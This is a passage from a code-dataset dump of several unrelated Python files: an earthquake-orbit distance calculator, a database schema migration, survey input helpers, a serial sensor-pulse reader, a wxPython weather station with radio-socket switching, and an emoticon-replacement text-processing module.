Setting parameters.]\n#3-1. Setting the long radius of the Earth.\n#\nR1 = 6378137\n#\n#3-2. Setting the short radius of the Earth.\n#\nR2 = 6356752.314\n#\n#3-3. Calculating the eccentricity of the Earth.\n#\ne1 = math.sqrt((R1*R1 - R2*R2)/(R1*R1))\n#\n#\n#[4. 
Importing earthquake and orbit data.]\n#4-1. Importing earthquake and orbit data from a csv file.\n#\npickupUSGSdata = pd.read_csv(\"pickupUSGSdata.csv\", index_col = 0)\n#\n#4-2. Resetting the index number.\n#\npickupUSGSdata.reset_index(drop=True, inplace = True)\n#\n#\n#[5. Calculating the distance for each data point.]\n#\nfor i in range(len(pickupUSGSdata)):\n#\n#5-1. Extracting the orbit number.\n#\n    num1 = pickupUSGSdata.iloc[i,10]\n#\n#5-2. Extracting the longitude.\n#\n    long1 = pickupUSGSdata.iloc[i,3]\n#\n#5-3. Extracting the latitude.\n#\n    lat1 = pickupUSGSdata.iloc[i,4]\n#\n#5-4. Extracting the time when the earthquake occurred.\n#\n    occur_time = pickupUSGSdata.iloc[i,0]\n#\n#5-5. Setting the file name using the orbit number and the\n#     time extracted above.\n#\n    filename = \".\\\\normalized_quake_orbit\\\\normalized_intensity_for_orbit\"+str(int(num1))+\"_quaketime_\"+str(occur_time)+\".csv\"\n#\n#5-6. Importing a file for the orbit data.\n#\n    df1 = pd.read_csv(filename,index_col = 0)\n#\n#5-7. Making a list object which will contain the distance\n#     for each data point in the orbit.\n#\n    list_dist = []\n#\n#5-8. Starting the calculation for all data points in the\n#     orbit data.\n#\n    for kk in range(len(df1)):\n#\n#5-9. Converting the latitude of the epicenters into the\n#     radian notation.\n#\n        ido1 = lat1*math.pi/180\n#\n#5-10. Converting the longitude of the epicenters into the\n#      radian notation.\n#\n        keido1 = long1*math.pi/180\n#\n#5-11. Converting the latitude of the orbit into the radian\n#      notation.\n#\n        ido2 = df1.iloc[kk,3]*math.pi/180\n#\n#5-12. Converting the longitude of the orbit into the radian\n#      notation.\n#\n        keido2 = df1.iloc[kk,4]*math.pi/180\n#\n#5-13. Calculating the difference between the latitude of\n#      the epicenter and the latitude of the orbit.\n#\n        dif_ido = ido2-ido1\n#\n#5-14. Calculating the difference between the longitude of\n#      the epicenter and the longitude of the orbit.\n#\n        dif_keido = keido2-keido1\n        if dif_keido>math.pi:\n            dif_keido = 2*math.pi-dif_keido\n#\n#5-15. Calculating the average of the latitude of the\n#      epicenter and the latitude of the orbit.\n#\n        myu_y = (ido1+ido2)/2\n#\n#5-16. Calculating several parameters which are necessary to\n#      calculate the distance.\n#\n        W1 = math.sqrt((1-e1*e1*math.sin(myu_y)*math.sin(myu_y)))\n        M1 = 6334832.10663254/(W1*W1*W1)\n        N1 = 6377397.155/W1\n#\n#5-17. Calculating the distance between the epicenter and the\n#      orbit in km using Hubeny formula.\n#\n        dist = math.sqrt(dif_ido*dif_ido*M1*M1+dif_keido*dif_keido*N1*N1*math.cos(myu_y)*math.cos(myu_y))\n        dist = dist/1000\n#\n#5-18. Inserting the data into a list object.\n#\n        list_dist.append(dist)\n#\n#\n#[6. Exporting data as a csv format file]\n#6-1. Adding the distance data to the orbit data.\n#\n    df1[\"distance\"] = list_dist\n#\n#6-2. Adding the elapsed time data to the orbit data.\n#     (built-in range is used here; numpy is not imported in this script)\n#\n    df1[\"elapsed_time\"] = list(range(0, len(df1)*2, 2))\n#\n#6-3. Deleting the list object used to add the distance data\n#     to the orbit data.\n#\n    del list_dist\n#\n#6-4. Setting the file name to export the data.\n#\n    output_name = filename.replace(\".\\\\normalized_quake_orbit\\\\normalized\",\"distance_normalized\")\n#\n#6-5. Exporting the data frame object into a csv file.\n#\n    df1.to_csv(output_name)\n#\n#6-6. Deleting the data frame object used to export the data.\n#\n    del df1\n#\n#\n#[7. measuring execution time]\n#7-1. Measuring finishing time with time module.\n#\nt2 = time.time()\nelapsed_time = t2-t1\nelapsed_time = round(elapsed_time,3)\n#\n#7-2. 
Output elapsed time\n#\nprint(\"elapsed time = \", elapsed_time, \"sec and in hour, \",elapsed_time/3600)\n#\n################################################################\n","sub_path":"9_moving_average/1./stacking_ver1.py","file_name":"stacking_ver1.py","file_ext":"py","file_size_in_byte":9711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"55212559","text":"from opengever.base.oguid import Oguid\nfrom opengever.core.upgrade import SchemaMigration\nfrom sqlalchemy.sql import select\nfrom sqlalchemy.sql.expression import column\nfrom sqlalchemy.sql.expression import table\n\n\nproposal_table = table(\n \"proposals\",\n column(\"id\"),\n column(\"admin_unit_id\"),\n column(\"int_id\"),\n column(\"submitted_admin_unit_id\"),\n column(\"submitted_int_id\"),\n column(\"title\"),\n column(\"legal_basis\"),\n column(\"initial_position\"),\n column(\"proposed_action\"),\n column(\"considerations\"),\n column(\"decision_draft\"),\n column(\"publish_in\"),\n column(\"disclose_to\"),\n column(\"copy_for_attention\"),\n)\n\n\nPROPOSAL_FIELDS = (\n 'title',\n 'legal_basis',\n 'initial_position',\n 'proposed_action',\n 'decision_draft',\n 'publish_in',\n 'disclose_to',\n 'copy_for_attention',\n)\n\nSUBMITTED_PROPOSAL_FIELDS = PROPOSAL_FIELDS + ('considerations',)\n\n\nclass MoveProposalFieldsToPloneObjects(SchemaMigration):\n \"\"\"Move proposal fields to plone objects.\n \"\"\"\n\n def migrate(self):\n self.migrate_data()\n self.drop_sql_columns()\n\n def has_proposals_for_multiple_admin_units(self):\n statement = select([proposal_table.c.admin_unit_id]).distinct()\n results = list(self.execute(statement))\n return len(results) > 1\n\n def migrate_data(self):\n proposals = self.execute(proposal_table.select()).fetchall()\n if proposals:\n msg = 'data migration supports only one admin-unit!'\n assert not self.has_proposals_for_multiple_admin_units(), msg\n\n for proposal in proposals:\n self.migrate_proposal_fields_to_plone_objects(proposal)\n\n def migrate_proposal_fields_to_plone_objects(self, sql_proposal):\n oguid = Oguid(sql_proposal.admin_unit_id, sql_proposal.int_id)\n proposal = oguid.resolve_object()\n for field_name in PROPOSAL_FIELDS:\n setattr(proposal, field_name, getattr(sql_proposal, field_name))\n\n submitted_oguid = Oguid(sql_proposal.submitted_admin_unit_id,\n sql_proposal.submitted_int_id)\n submitted_proposal = submitted_oguid.resolve_object()\n if not submitted_proposal:\n return\n\n for field_name in SUBMITTED_PROPOSAL_FIELDS:\n setattr(submitted_proposal, field_name,\n getattr(sql_proposal, field_name))\n\n def drop_sql_columns(self):\n for column_name in SUBMITTED_PROPOSAL_FIELDS:\n self.op.drop_column(\"proposals\", column_name)\n","sub_path":"opengever/core/upgrades/20170619120631_move_proposal_fields_to_plone_object/upgrade.py","file_name":"upgrade.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"372617576","text":"# This class has common Surveying attributes used by many Survey Codes\n# when collecting data The class Functions will operate on all of the\n# common attributes instance variables for most all survey code choices\n# since most all of them share these same attributes.\nimport ChoicesAndTypes\nfrom mongoengine import *\n# Initiating the connection\n# connect('mydb')\n\n\nclass CommonAttributes(Document):\n gps_point = IntField(required=True, unique=True, min_value=0)\n cover = FloatField(required=True, 
min_value=0.0)\n    ngc = IntField(required=True, min_value=0)\n    notes = StringField(required=True)\n    meta = {'allow_inheritance': True}\n\n\ndef collect_gps_point():\n    \"\"\"\n    This method collects the current GPS Point or Shot number for the\n    Feature being collected. It catches any words or decimal value\n    numbers that are input and throws an error for such. It will only\n    accept whole numbers.\n    \"\"\"\n    while True:\n        try:\n            gps_point = int(input(\"Enter the GPS Point for this Feature: \"))\n        except ValueError:\n            print(ChoicesAndTypes.value_error + \" Whole numbers only. No\"\n                  \" words or decimals.\")\n        else:\n            break\n    return gps_point\n\n\ndef collect_cover():\n    \"\"\"\n    This method collects the cover for a survey feature that was\n    collected. It catches any words or whole numbers and will accept\n    only decimal values.\n    \"\"\"\n    while True:\n        try:\n            cover = float(input(\"Enter the Cover for this Feature: \"))\n        except ValueError:\n            print(ChoicesAndTypes.value_error + \" Decimal numbers only. No\"\n                  \" words or whole numbers.\")\n        else:\n            break\n    return cover\n\n\ndef collect_ngc():\n    \"\"\"\n    This method collects the current GPS Point Natural Ground for Cover\n    for the Feature being collected. It catches any words or decimal\n    value numbers that are input and throws an error for such. It will\n    only accept whole numbers.\n    \"\"\"\n    while True:\n        try:\n            ngc = int(input(\"Enter the Natural Ground Shot for Cover for\"\n                            \" this Feature: \"))\n        except ValueError:\n            print(ChoicesAndTypes.value_error + \" Whole numbers only. No\"\n                  \" words or decimals.\")\n        else:\n            break\n    return ngc\n\n\ndef collect_notes():\n    \"\"\"\n    This method collects any notes that may need to be noted for the\n    collected survey feature.\n    \"\"\"\n    notes = str(input(\"Notes: \"))\n    return notes\n","sub_path":"SurveyCodesAttributes.py","file_name":"SurveyCodesAttributes.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"384699891","text":"#!/usr/bin/env python3\n# import pyftdi.serialext\nimport struct\nimport serial\n\nfrom pulseDecoder import PulseDecoder\n\nimport sys\n\nTIMER_FREQUENCY = 48e6\n\n# one decoder per sensor; a single shared instance would mix per-sensor pulse state\npulseDecoders = [PulseDecoder() for _ in range(8)]\n\nif len(sys.argv) > 1:\n    port = open(sys.argv[1], \"rb\")\nelse:\n    # port = pyftdi.serialext.serial_for_url('ftdi://ftdi:2232h/2', baudrate=230400)\n    port = serial.Serial(\"/dev/ttyUSB1\", 230400)\n\nprint(\"Waiting for sync ....\")\nbuffer = [0] * 7\nsync = False\nwhile not sync:\n    data = port.read(1)\n    buffer = [data[0]] + buffer[:6]\n    sync = all(b != 0 for b in buffer)\n\nprint(\"Reading pulses ...\")\n\nwhile True:\n    data = port.read(7)\n    if len(data) < 7:\n        break\n    if data[-1] != 0:\n        # print(\"Sync!\")\n        continue\n    data = data[:-1]\n    # 6-byte payload: little-endian uint32 (top 3 bits = sensor id, low 29 bits = timestamp)\n    # followed by a uint16 pulse length in timer ticks\n    timestamp, length = struct.unpack(\"<IH\", data)\n    sensor_id = timestamp >> 29\n    timestamp = timestamp & 0x1FFFFFFF\n\n    decoded = pulseDecoders[sensor_id].processPulse(timestamp, length/TIMER_FREQUENCY)\n\n    # if decoded['pulseType'] == 'sweep':\n    #     typestr = \"sweep\"\n    # else:\n    #     typestr = \"sync {}\".format(decoded['sync'])\n\n    # print(\"{} - TS: 0x{:08x}, Length: {:4d}, δ: {:7.3f}ms -- {}\".format(\n    #     sensor_id, timestamp, length, 0, typestr))\n\n    if 'baseStationInfo' in decoded:\n        print(\"Decoded baseStationInfo data frame:\", decoded['baseStationInfo'])\n        # sys.exit(0)\n\n    # if 'angleMeasurement' in decoded:\n    #     print(\"{} - Angle measured:\".format(sensor_id), decoded['angleMeasurement'])\n\n    # print(\"{}: {:8x} {:4x}\".format(sensor_id, timestamp, 
length))\n\n\nport.close()","sub_path":"tools/readUartPulses.py","file_name":"readUartPulses.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"285045549","text":"# coding=utf-8\n\"\"\"\nDisplay weather data from local 1-wire and internet-sources, drive remote controlled sockets.\nDesigned for BeagleBone Black and BB-View\n\"\"\"\nimport os\nimport re\nfrom urllib import urlopen\n# noinspection PyProtectedMember\nfrom wxPython._core import wxImageFromStream\nimport logging\nfrom StringIO import StringIO\nimport matplotlib\nfrom matplotlib.ticker import MaxNLocator\nfrom mydatabase import MyDatabase\n\n__author__ = 'xenobyter'\n\nimport time\nimport wx\n\nfrom MainFrame import MainFrame\nfrom PressureFrame import PressureFrame\nfrom TemperatureFrame import TemperatureFrame\nfrom SocketFrame import SocketFrame\nfrom internetweather import InternetWeather\nfrom sensors import MyBMP085, Dallas\n\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigureCanvas\n\n\nclass MyMainFrame(MainFrame):\n \"\"\"\n Derive MainFrame to implement handlers.\n \"\"\"\n\n def __init__(self, *args, **kwds):\n super(MyMainFrame, self).__init__(*args, **kwds)\n\n # register and start clock\n self.clock_timer = wx.Timer(self)\n self.Bind(wx.EVT_TIMER, self.clock_update, self.clock_timer)\n self.clock_timer.Start(1000)\n\n # register and start update for weather\n self.weather_update(None)\n self.weather_timer = wx.Timer(self)\n self.Bind(wx.EVT_TIMER, self.weather_update, self.weather_timer)\n self.weather_timer.Start(1800000)\n\n # register and start updates for BMP085\n self.sensors_timer = wx.Timer(self)\n self.Bind(wx.EVT_TIMER, self.sensors_update, self.sensors_timer)\n self.sensors_timer.Start(60000)\n\n # register and start task to compact database\n self.db_compact(None)\n self.db_compact_timer = wx.Timer(self)\n self.Bind(wx.EVT_TIMER, self.db_compact, self.db_compact_timer)\n self.db_compact_timer.Start(86400000)\n\n # noinspection PyUnusedLocal\n @staticmethod\n def db_compact(event):\n \"\"\"Call compact on the main table\n\n :param event: unused\n \"\"\"\n db = MyDatabase()\n db.compact()\n db.close()\n\n # noinspection PyUnusedLocal\n def clock_update(self, event):\n \"\"\"\n Update time and date to MyMainFrame.\n :param event:\n \"\"\"\n self.label_time.SetLabel(time.strftime(\"%d.%m.%Y %H:%M:%S\"))\n\n # noinspection PyUnusedLocal\n def weather_update(self, event):\n \"\"\"\n Gets a dictionary with the weather from xbInternetWeather and displays the data to MyMainFrame.\n :param event:\n\n \"\"\"\n my_weather = InternetWeather()\n my_weather_dict = my_weather.get_weather('12831619')\n logging.debug(my_weather_dict)\n\n self.label_condition.SetLabel(my_weather_dict['condition_text'])\n self.label_inet_temp.SetLabel(my_weather_dict['condition_temp'] + u'°C')\n self.label_felt_temp.SetLabel(my_weather_dict['wind_chill'] + u'°C')\n self.label_high_temp.SetLabel(my_weather_dict['forecast0_high'] + u'°C')\n self.label_low_temp.SetLabel(my_weather_dict['forecast0_low'] + u'°C')\n str_wind_dir = 'N'\n int_wind_dir = int(my_weather_dict['wind_direction'])\n logging.debug(\"weather_update: wind dir \" + my_weather_dict['wind_direction'])\n if int_wind_dir in range(23, 68):\n str_wind_dir = 'NO'\n if int_wind_dir in range(69, 114):\n str_wind_dir = 'O'\n if int_wind_dir in range(115, 160):\n str_wind_dir = 'SO'\n if int_wind_dir in range(161, 206):\n 
str_wind_dir = 'S'\n if int_wind_dir in range(207, 252):\n str_wind_dir = 'SW'\n if int_wind_dir in range(253, 298):\n str_wind_dir = 'W'\n if int_wind_dir in range(299, 344):\n str_wind_dir = 'NW'\n self.label_wind.SetLabel(my_weather_dict['wind_speed'].split('.')[0] + \"km/h aus \" + str_wind_dir)\n self.label_humidity.SetLabel(my_weather_dict['atmosphere_humidity'] + '%')\n\n # get the bitmaps from the urls\n img = wxImageFromStream(StringIO(urlopen(my_weather_dict['condition_url']).read()))\n self.bitmap_condition.SetBitmap(wx.BitmapFromImage(img))\n\n # forecast0\n self.label_forecast0_day.SetLabel(my_weather_dict['forecast0_day'])\n self.label_forecast0_low.SetLabel(my_weather_dict['forecast0_low'] + u'°C')\n self.label_forecast0_high.SetLabel(my_weather_dict['forecast0_high'] + u'°C')\n img = wxImageFromStream(StringIO(urlopen(my_weather_dict['forecast0_url']).read()))\n self.bitmap_condition_0.SetBitmap(wx.BitmapFromImage(img))\n self.bitmap_condition_0.SetToolTipString(my_weather_dict['forecast0_text'])\n\n # forecast1\n self.label_forecast1_day.SetLabel(my_weather_dict['forecast1_day'])\n self.label_forecast1_low.SetLabel(my_weather_dict['forecast1_low'] + u'°C')\n self.label_forecast1_high.SetLabel(my_weather_dict['forecast1_high'] + u'°C')\n img = wxImageFromStream(StringIO(urlopen(my_weather_dict['forecast1_url']).read()))\n self.bitmap_condition_1.SetBitmap(wx.BitmapFromImage(img))\n self.bitmap_condition_1.SetToolTipString(my_weather_dict['forecast1_text'])\n\n # forecast2\n self.label_forecast2_day.SetLabel(my_weather_dict['forecast2_day'])\n self.label_forecast2_low.SetLabel(my_weather_dict['forecast2_low'] + u'°C')\n self.label_forecast2_high.SetLabel(my_weather_dict['forecast2_high'] + u'°C')\n img = wxImageFromStream(StringIO(urlopen(my_weather_dict['forecast2_url']).read()))\n self.bitmap_condition_2.SetBitmap(wx.BitmapFromImage(img))\n self.bitmap_condition_2.SetToolTipString(my_weather_dict['forecast2_text'])\n\n # forecast3\n self.label_forecast3_day.SetLabel(my_weather_dict['forecast3_day'])\n self.label_forecast3_low.SetLabel(my_weather_dict['forecast3_low'] + u'°C')\n self.label_forecast3_high.SetLabel(my_weather_dict['forecast3_high'] + u'°C')\n img = wxImageFromStream(StringIO(urlopen(my_weather_dict['forecast3_url']).read()))\n self.bitmap_condition_3.SetBitmap(wx.BitmapFromImage(img))\n self.bitmap_condition_3.SetToolTipString(my_weather_dict['forecast3_text'])\n\n # forecast4\n self.label_forecast4_day.SetLabel(my_weather_dict['forecast4_day'])\n self.label_forecast4_low.SetLabel(my_weather_dict['forecast4_low'] + u'°C')\n self.label_forecast4_high.SetLabel(my_weather_dict['forecast4_high'] + u'°C')\n img = wxImageFromStream(StringIO(urlopen(my_weather_dict['forecast4_url']).read()))\n self.bitmap_condition_4.SetBitmap(wx.BitmapFromImage(img))\n self.bitmap_condition_4.SetToolTipString(my_weather_dict['forecast4_text'])\n\n # noinspection PyUnusedLocal\n def sensors_update(self, event):\n \"\"\"make sure we write all sensors data to db\n :param event: unused\n \"\"\"\n\n bmp085 = MyBMP085()\n dallas = Dallas()\n\n # read data from bmp085\n bmp085_data = bmp085.get_bmp085()\n logging.debug('BMP05: ' + str(bmp085_data))\n\n # try to read dallas-data\n dallas_data = dallas.get_dallas()\n logging.debug('Dallas: ' + str(dallas_data))\n try:\n t = dallas_data['28-00000465db0c']\n str_t = '{:0.1f}'.format(t)\n self.label_inet_temp.SetLabel(str_t + u'°C')\n except KeyError:\n logging.error('No Data from outdoor sensor')\n\n def OnPressure(self, event):\n \"\"\"Opens 
the pressure frame\n\n :param event: unused\n \"\"\"\n frame_pressure = MyPressureFrame(None, wx.ID_ANY, \"\")\n frame_pressure.Show()\n\n def OnTemperature(self, event):\n \"\"\"Opens the temperature frame\n\n :param event: unused\n \"\"\"\n frame_temperature = MyTemperatureFrame(None, wx.ID_ANY, \"\")\n frame_temperature.Show()\n\n def OnSocket(self, event):\n frame_socket = MySocketFrame(None, wx.ID_ANY, \"\")\n frame_socket.Show()\n\n\nclass MyPressureFrame(PressureFrame):\n \"\"\"\n Derive PressureFrame to implement handlers.\n \"\"\"\n\n def __init__(self, *args, **kwds):\n super(MyPressureFrame, self).__init__(*args, **kwds)\n self.figure = Figure()\n self.figure.set_size_inches(6.0375, 2.875)\n self.figure.set_facecolor('#d6d6d6')\n self.axes = self.figure.add_subplot(111)\n self.paint_diagram()\n\n def OnBack(self, event):\n \"\"\"Close the pressure frame\n :param event: unused\n \"\"\"\n self.Close()\n event.Skip()\n\n def OnToggleHistory(self, event):\n \"\"\"Start a repaint when button_toggle ist changed\n\n :param event: unused\n \"\"\"\n logging.debug('Toggle_button: ' + str(self.button_toggle.GetValue()))\n self.paint_diagram()\n\n def paint_diagram(self):\n \"\"\"Actually paint the graph\n \"\"\"\n db = MyDatabase()\n data = db.read_pressure(time.time() - 86400, self.button_toggle.GetValue())\n\n self.axes.clear()\n # Set title and X-Axis format depending on the state of button_toggle\n if self.button_toggle.GetValue():\n # noinspection PyUnresolvedReferences\n self.axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter('%d.%m'))\n self.axes.set_title('Historie')\n else:\n # noinspection PyUnresolvedReferences\n self.axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter('%H:%M'))\n self.axes.set_title('24h-Verlauf')\n\n # Adjust the font size of all ticks\n # noinspection PyUnresolvedReferences\n ticks_font = matplotlib.font_manager.FontProperties(size=10)\n for label in self.axes.get_xticklabels():\n label.set_fontproperties(ticks_font)\n for label in self.axes.get_yticklabels():\n label.set_fontproperties(ticks_font)\n\n # Set maximum number of ticks\n self.axes.xaxis.set_major_locator(MaxNLocator(9))\n\n # Finally plot it\n self.axes.set_ylabel('Luftdruck in hPa')\n logging.debug('Data: ' + str(len(data)))\n if data:\n self.axes.plot(data[0::2], data[1::2])\n self.axes.xaxis_date()\n self.panel_1 = FigureCanvas(self, -1, self.figure)\n\n\nclass MyTemperatureFrame(TemperatureFrame):\n \"\"\"\n Derive TemperatureFrame to implement handlers.\n \"\"\"\n\n def __init__(self, *args, **kwds):\n super(MyTemperatureFrame, self).__init__(*args, **kwds)\n self.figure = Figure()\n self.figure.set_size_inches(6.0375, 2.875)\n self.figure.set_facecolor('#d6d6d6')\n self.axes = self.figure.add_subplot(111)\n\n self.db = MyDatabase()\n # append all sensors to combobox\n for sensor in self.db.dallas_sensors():\n logging.debug(sensor[0])\n self.combo_box_sensor.Append(sensor[0])\n\n # read default sensors\n default_sensor = self.db.read_settings('default_dallas_sensor')\n\n # check, if we have the default in our combobox\n if default_sensor in self.combo_box_sensor.GetItems():\n self.combo_box_sensor.SetValue(default_sensor)\n else:\n # otherwise choose the first one\n self.combo_box_sensor.Select(0)\n\n self.paint_diagram()\n\n def OnBack(self, event):\n \"\"\"Close the pressure frame\n :param event: unused\n \"\"\"\n self.Close()\n event.Skip()\n\n def OnToggleHistory(self, event):\n \"\"\"Start a repaint when button_toggle ist changed\n\n :param event: unused\n \"\"\"\n 
logging.debug('Toggle_button: ' + str(self.button_toggle.GetValue()))\n self.paint_diagram()\n\n def OnCombo(self, event):\n \"\"\"Start a repaint when combobox changes\n\n :param event: unused\n \"\"\"\n logging.debug('ComboBox: ' + str(self.combo_box_sensor.GetValue()))\n self.db.write_settings('default_dallas_sensor', str(self.combo_box_sensor.GetValue()))\n self.paint_diagram()\n\n def paint_diagram(self):\n \"\"\"Actually paint the graph\n \"\"\"\n data = self.db.read_dallas(self.combo_box_sensor.GetValue(), time.time() - 86400, self.button_toggle.GetValue())\n\n self.axes.clear()\n # Set title and X-Axis format depending on the state of button_toggle\n if self.button_toggle.GetValue():\n # noinspection PyUnresolvedReferences\n self.axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter('%d.%m'))\n self.axes.set_title('Historie')\n else:\n # noinspection PyUnresolvedReferences\n self.axes.xaxis.set_major_formatter(matplotlib.dates.DateFormatter('%H:%M'))\n self.axes.set_title('24h-Verlauf')\n\n # Adjust the font size of all ticks\n # noinspection PyUnresolvedReferences\n ticks_font = matplotlib.font_manager.FontProperties(size=10)\n for label in self.axes.get_xticklabels():\n label.set_fontproperties(ticks_font)\n for label in self.axes.get_yticklabels():\n label.set_fontproperties(ticks_font)\n\n # Set maximum number of ticks\n self.axes.xaxis.set_major_locator(MaxNLocator(9))\n\n # Finally plot it\n self.axes.set_ylabel(u'Temperatur in °C')\n logging.debug('Data: ' + str(len(data)))\n if data:\n self.axes.plot(data[0::2], data[1::2])\n self.axes.xaxis_date()\n self.panel_1 = FigureCanvas(self, -1, self.figure)\n\n\nclass MySocketFrame(SocketFrame):\n def __init__(self, *args, **kwds):\n super(MySocketFrame, self).__init__(*args, **kwds)\n\n # fill socket states from time of day\n sockets = {}\n t = int(time.strftime('%H'))\n wd = int(time.strftime('%w'))\n if t >= 18:\n sockets['1111101000'] = '10'\n else:\n sockets['1111101000'] = '01'\n if 9 <= t < 21:\n sockets['1111110000'] = '10'\n else:\n sockets['1111110000'] = '01'\n if 6 <= t < 20:\n sockets['1111100100'] = '10'\n else:\n sockets['1111100100'] = '01'\n if 13 <= t < 23:\n sockets['1111100010'] = '01'\n else:\n sockets['1111100010'] = '10'\n if wd < 2 and 6 <= t < 13:\n sockets['1111100010'] = '01'\n\n # determine the current state from syslog\n logfile = open('/var/log/syslog', 'r')\n for line in logfile:\n if re.search('./rcswitch', line):\n logging.debug('SocketFrame: ' + line)\n position = line.index('./rcswitch') + 11\n sockets[line[position:position + 10]] = line[position + 10:position + 12]\n logfile.close()\n\n # set the buttons\n if sockets['1111101000'] == '10':\n self.button_bedroom.SetValue(True)\n if sockets['1111110000'] == '10':\n self.button_aquarium.SetValue(True)\n if sockets['1111100100'] == '10':\n self.button_kitchen.SetValue(True)\n if sockets['1111100010'] == '10':\n self.button_livingroom.SetValue(True)\n\n def OnBtnBack(self, event):\n self.Close()\n event.Skip()\n\n def OnBtnAquarium(self, event):\n if self.button_aquarium.GetValue():\n os.system('cd /home/frank/Projekte/xbWeatherSocket/RCSwitch; ./rcswitch 111111000010')\n else:\n os.system('cd /home/frank/Projekte/xbWeatherSocket/RCSwitch; ./rcswitch 111111000001')\n\n def OnBtnBedroom(self, event):\n if self.button_bedroom.GetValue():\n os.system('cd /home/frank/Projekte/xbWeatherSocket/RCSwitch; ./rcswitch 111110100010')\n else:\n os.system('cd /home/frank/Projekte/xbWeatherSocket/RCSwitch; ./rcswitch 111110100001')\n\n def 
OnBtnKitchen(self, event):\n        if self.button_kitchen.GetValue():\n            os.system('cd /home/frank/Projekte/xbWeatherSocket/RCSwitch; ./rcswitch 111110010010')\n        else:\n            os.system('cd /home/frank/Projekte/xbWeatherSocket/RCSwitch; ./rcswitch 111110010001')\n\n    def OnBtnLivingroom(self, event):\n        if self.button_livingroom.GetValue():\n            os.system('cd /home/frank/Projekte/xbWeatherSocket/RCSwitch; ./rcswitch 111110001010')\n        else:\n            os.system('cd /home/frank/Projekte/xbWeatherSocket/RCSwitch; ./rcswitch 111110001001')\n\n\nclass MyApp(wx.App):\n    \"\"\"\n    Here we start the App with the Main frame.\n    \"\"\"\n    # noinspection PyPep8Naming\n    def OnInit(self):\n        \"\"\"\n        Start MyMainFrame as the TopWindow.\n        :return: True\n        \"\"\"\n        wx.InitAllImageHandlers()\n        frame_main = MyMainFrame(None, wx.ID_ANY, \"\")\n        self.SetTopWindow(frame_main)\n        frame_main.Show()\n        return True\n\n\nif __name__ == \"__main__\":\n    logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.ERROR)\n    app = MyApp(0)\n    app.MainLoop()\n","sub_path":"xbWeatherSock.py","file_name":"xbWeatherSock.py","file_ext":"py","file_size_in_byte":16901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"582077248","text":"# coding: utf-8\nimport nltk\nimport string\nimport numpy as np\nfrom topic import topic\nfrom nltk.stem import WordNetLemmatizer\nfrom textblob.blob import TextBlob\n\nlemmatizer = WordNetLemmatizer()\n\npunctuations = set(string.punctuation)\n\nhappy = set([':-)', ':)', '(:', '=)', ':-d', ':d', '=d', 'xd', 'd=', 'd;', 'd:', 'dx', ';-)', ';d', ';)', ':-p', ':p', 'xp', 'x-p', '=p', '>:-)',\n\t'>:)', 'o:-)', 'o:)', '0:-)', '0:)', 'b)',\n\t'bd', 'b-)', 'b-d', '( ͡° ͜ʖ ͡°)'])\n\nsad = set([':-(', ':(', '):', '=(', '(´・ω・`)', '(`・ω・´)', '(・ω・)'])\n\ncute = set([\":3\", \"=3\"])\n\nsurprised = set([':o', ':-o'])\n\nlove = set([':*', ':-*'])\n\nindifferent = set([':-/', ':/', '=/',\n\t':-\\ ', ':\\ ', '=\\ ', ':l', '=l', ':-|', ':|', '-_-',\n\t'¯\\_(ツ)_/¯'])\n\n# list of intensifiers that could be used in sarcastic text\nintensifiers = set(['already', 'bleeping', 'bloody', 'dafuq', 'damn', 'dickens', 'downright', 'effing', 'ever',\n                    'everliving', 'everloving', 'flipping', 'freaking', 'fricking', 'frigging', 'fuck', 'fucking', 'hell',\n                    'hella', 'holy', 'motherfreaking', 'motherfucking', 'on earth', 'precious', 'heck', 'well'])\n\n# list of interjections that could be used in sarcastic text\ninterjections = set(['absolutely', 'ahh', 'aha', 'ahem', 'ahoy', 'agreed', 'alas', 'alright', 'alrighty', 'amen', 'anytime',\n                     'argh', 'anyhow', 'as if', 'attaboy', 'attagirl', 'aww', 'bam', 'behold', 'bingo', 'blah', 'bless you',\n                     'bravo', 'cheers', 'darn', 'dang', 'doh', 'duh', 'eh', 'gee', 'geepers', 'golly', 'goodness',\n                     'goodness gracious', 'gosh', 'ha', 'hallelujah', 'hey', 'hmmm', 'huh', 'indeed', 'jeez', 'my gosh',\n                     'no', 'now', 'nah', 'oops', 'ouch', 'phew', 'please', 'shoot', 'shucks', 'there', 'uggh', 'waa',\n                     'what', 'woah', 'woops', 'wow', 'yay', 'yes', 'yikes'])\n\ndef replace(comment):\n\tnew_comment = comment\n\tfor em in happy:\n\t\tnew_comment = new_comment.replace(em, \"happy\")\n\tfor em in sad:\n\t\tnew_comment = new_comment.replace(em, \"sad\")\n\tfor em in cute:\n\t\tnew_comment = new_comment.replace(em, \"cute\")\n\tfor em in surprised:\n\t\tnew_comment = new_comment.replace(em, \"surprised\")\n\tfor em in love:\n\t\tnew_comment = new_comment.replace(em, \"love\")\n\tfor em in indifferent:\n\t\tnew_comment = new_comment.replace(em, \"indifferent\")\n\n\treturn 
